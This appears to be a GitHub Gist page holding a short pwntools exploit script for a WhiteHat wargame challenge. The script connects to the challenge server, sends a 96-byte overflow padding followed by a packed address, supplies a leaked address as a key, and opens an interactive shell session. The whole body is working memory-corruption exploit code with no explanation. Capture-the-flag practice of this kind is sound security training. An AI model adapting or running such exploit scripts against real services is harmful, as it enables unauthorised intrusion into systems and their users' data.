Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
from pwn import *
puts = 0x0804A018
leak = 0x0804865F
rand = 0x0804A028
r = remote('chall05-pwn02.wargame.whitehat.vn', 28104)
# r = process('./pwnd')
# gdb.attach(r, )
r.recvuntil("name: ")
r.sendline('a'*96+p32(rand))
r.recvuntil("key1: ")
r.sendline(str(leak))
log.info(leak)
log.info(rand)
# log.info(r.recv(1024))
r.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.